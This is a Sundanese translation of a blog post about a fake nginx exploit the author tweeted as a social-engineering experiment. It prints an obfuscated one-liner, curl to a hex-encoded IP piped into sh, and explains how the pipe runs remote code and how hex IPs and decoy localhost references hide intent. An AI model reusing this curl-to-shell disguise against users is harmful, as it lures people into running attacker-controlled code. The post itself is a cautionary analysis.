ProHoster > Blog > Administrasi > Kasuksésan percobaan sosial kalayan garapan nginx palsu

Kasuksésan percobaan sosial kalayan garapan nginx palsu

Catetan. narjamahkeun.: nu ngarang catetan aslina, diterbitkeun dina 1 Juni, mutuskeun pikeun ngalakonan percobaan diantara maranéhanana museurkeun kaamanan informasi. Pikeun ngalakukeun ieu, anjeunna nyiapkeun eksploitasi palsu pikeun kerentanan anu teu diungkabkeun dina server wéb sareng dipasang dina Twitter na. asumsi-Na - bisa langsung kakeunaan ku spesialis anu bakal ningali tipu daya atra dina kode - teu ngan teu jadi kanyataan ... Aranjeunna ngaleuwihan sakabeh ekspektasi, sarta dina arah nu lalawanan: tweet nu narima rojongan badag ti loba jalma anu henteu. pariksa eusina.

Kasuksésan percobaan sosial kalayan garapan nginx palsu

TL; DR: Entong nganggo file pipelining dina sh atanapi bash dina kaayaan naon waé. Ieu mangrupikeun cara anu saé pikeun leungit kontrol komputer anjeun.

Abdi hoyong bagikeun sareng anjeun carita pondok ngeunaan garapan PoC komik anu diciptakeun dina 31 Mei. Anjeunna mucunghul promptly di respon kana warta ti Alisa Esage Shevchenko, anggota Inisiatif Poé nol (ZDI), yén inpormasi ngeunaan kerentanan dina NGINX ngarah kana RCE (eksekusi kode jauh) bakal énggal diungkabkeun. Kusabab NGINX ngawasa seueur situs wéb, warta éta kedah janten bom. Tapi kusabab telat dina prosés "panyingkepan tanggung jawab", detil naon anu kajantenan henteu dipikanyaho - ieu mangrupikeun prosedur ZDI standar.

Kasuksésan percobaan sosial kalayan garapan nginx palsu
Tweet ngeunaan panyingkepan kerentanan dina NGINX

Sanggeus réngsé ngerjakeun téknik obfuscation anyar dina curl, kuring ngutip tweet asli sareng "bocorkeun PoC anu tiasa dianggo" anu diwangun ku hiji garis kode anu konon ngamangpaatkeun kerentanan anu kapanggih. Tangtu, ieu omong kosong lengkep. Kuring nganggap yén kuring bakal langsung kakeunaan, sareng anu pangsaéna kuring bakal nampi sababaraha retweet (aduh muhun).

Kasuksésan percobaan sosial kalayan garapan nginx palsu
Tweet kalawan garapan palsu

Najan kitu, kuring teu bisa ngabayangkeun naon anu lumangsung salajengna. Popularitas tweet kuring melejit. Ahéng, dina momen (15:00 waktos Moscow 1 Juni) sababaraha urang geus sadar yén ieu téh palsu a. Seueur jalma anu nga-retweet deui tanpa mariksa pisan (sumawona ngaguman grafik ASCII anu saé anu kaluaran).

Kasuksésan percobaan sosial kalayan garapan nginx palsu
Tingali kumaha éndahna!

Sanaos sadayana puteran sareng warna ieu saé, éta écés yén jalma kedah ngajalankeun kode dina mesinna pikeun ningali éta. Kabeneran, browser dianggo cara nu sami, sarta digabungkeun jeung kanyataan yén kuring teu hayang pisan meunang kana masalah hukum, kode dikubur di situs abdi ngan nelepon gema tanpa nyobian masang atawa ngaéksekusi kode tambahan.

A digression leutik: netspooky, dnz, kuring jeung lalaki séjén ti tim Rame-rame Kami parantos maénkeun sababaraha cara pikeun ngabingungkeun paréntah curl samentawis ayeuna kusabab éta keren ... sareng kami geeks. netspooky sareng dnz mendakan sababaraha metode anyar anu sigana pisan ngajangjikeun ka kuring. Kuring ngagabung dina senang jeung diusahakeun nambahkeun konversi IP decimal kana kantong trik. Tétéla IP ogé bisa dirobah jadi format hexadecimal. Sumawona, curl sareng seueur alat NIX anu sanés ngahakan IP héksadesimal! Janten éta ngan ukur nyiptakeun garis paréntah anu ngayakinkeun sareng aman. Tungtungna kuring netepkeun ieu:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Téknik sosio-éléktronik (SEE) - leuwih ti ngan phishing

Kasalametan jeung familiarity éta bagian utama percobaan ieu. Jigana aranjeunna naon ngarah ka kasuksésan na. Garis paréntah jelas nunjukkeun kaamanan ku ngarujuk kana "127.0.0.1" (localhost anu terkenal). Localhost dianggap aman sareng data dina éta henteu kantos ngantunkeun komputer anjeun.

Familiarity mangrupikeun komponén SEE konci kadua tina percobaan. Kusabab panongton udagan utamana diwangun ku jalma akrab jeung dasar-dasar kaamanan komputer, hal anu penting pikeun nyieun kode ambéh bagian tina eta seemed akrab jeung akrab (ku kituna aman). Nginjeum unsur-unsur tina konsép eksploitasi kuno sareng ngagabungkeun aranjeunna dina cara anu teu biasa parantos kabuktosan suksés pisan.

Di handap ieu analisa detil ngeunaan hiji-liner. Sagalana dina daptar ieu ngagem alam kosmétik, sarta praktis euweuh diperlukeun pikeun operasi sabenerna na.

Komponén naon anu leres-leres diperyogikeun? Ieu -gsS, -O 0x0238f06a, |sh jeung web server sorangan. Pangladén wéb henteu ngandung paréntah anu jahat, tapi ngan ukur nyayogikeun grafik ASCII nganggo paréntah echo dina naskah anu aya dina index.html. Lamun pamaké diasupkeun garis kalawan |sh di tengah, index.html dimuat jeung dieksekusi. Untungna, custodians sahiji web server teu boga niat goréng.

  • ../../../%00 - ngagambarkeun bade saluareun diréktori;
  • ngx_stream_module.so - jalur ka modul NGINX acak;
  • /bin/sh%00<'protocol:TCP' - urang konon launching /bin/sh dina mesin target sareng alihan kaluaran ka saluran TCP;
  • -O 0x0238f06a#PLToffset - bahan rusiah, supplemented #PLToffset, Pikeun katingal a memori offset kumaha bae anu dikandung dina PLT;
  • |sh; - sempalan penting séjén. Urang kedah alihan kaluaran ka sh/bash supados ngaéksekusi kode anu asalna tina server wéb anu nyerang anu aya di 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - a dummy nu netcat nujul kana /dev/tcp/localhostsupaya sagalana kasampak aman deui. Kanyataanna, teu nanaon sarta kaasup dina garis pikeun kageulisan.

Ieu menyimpulkan decoding tina naskah hiji-baris jeung sawala ngeunaan aspék "rékayasa sosio-éléktronik" (phishing intricate).

Konfigurasi Web Server jeung Countermeasures

Kusabab seuseueurna palanggan kuring nyaéta infosec / hacker, kuring mutuskeun pikeun ngajantenkeun pangladén wéb sakedik langkung tahan kana ungkapan "minat" dina pihakna, ngan supados para lalaki gaduh hal anu kedah dilakukeun (sareng éta bakal pikaresepeun disetél). Abdi henteu badé daptar sadaya pitfalls di dieu saprak percobaan masih lumangsung, tapi di dieu aya sababaraha hal anu dilakukeun ku server:

  • Aktif ngawas usaha distribusi dina jaringan sosial tangtu sareng ngagantikeun rupa-rupa gambar leutik sawangan pikeun ngadorong pangguna pikeun ngaklik tautan.
  • Mindahkeun Chrome/Mozilla/Safari/jsb ka video promosi Thugcrowd tinimbang mintonkeun skrip cangkang.
  • Watches pikeun tanda atra intrusion / Hacking blatant, lajeng dimimitian alihan requests ka server NSA (ha!).
  • Masang Trojan, kitu ogé rootkit mios, dina sadaya komputer anu pangguna nganjang ka host tina browser biasa (ngan bercanda!).

Kasuksésan percobaan sosial kalayan garapan nginx palsu
Hiji bagian leutik tina antimér

Dina hal ieu, hiji-hijina tujuan kuring nyaéta pikeun ngawasaan sababaraha fitur Apache - khususna, aturan anu saé pikeun alihan pamundut - sareng panginten: naha henteu?

NGINX Exploit (Real!)

Ngalanggan @alisaesage dina Twitter sareng tuturkeun karya hébat ZDI dina ngatasi kerentanan anu nyata sareng ngamangpaatkeun kasempetan di NGINX. Karya maranéhanana geus salawasna fascinated kuring sarta Kami nganuhunkeun ka Alice pikeun kasabaran dirina kalawan sagala nyebutkeun jeung bewara tweet bodo kuring disababkeun. Untungna, éta ogé ngagaduhan anu saé: éta ngabantosan ningkatkeun kasadaran ngeunaan kerentanan NGINX, ogé masalah anu disababkeun ku panyalahgunaan curl.

sumber: www.habr.com

Tambahkeun komentar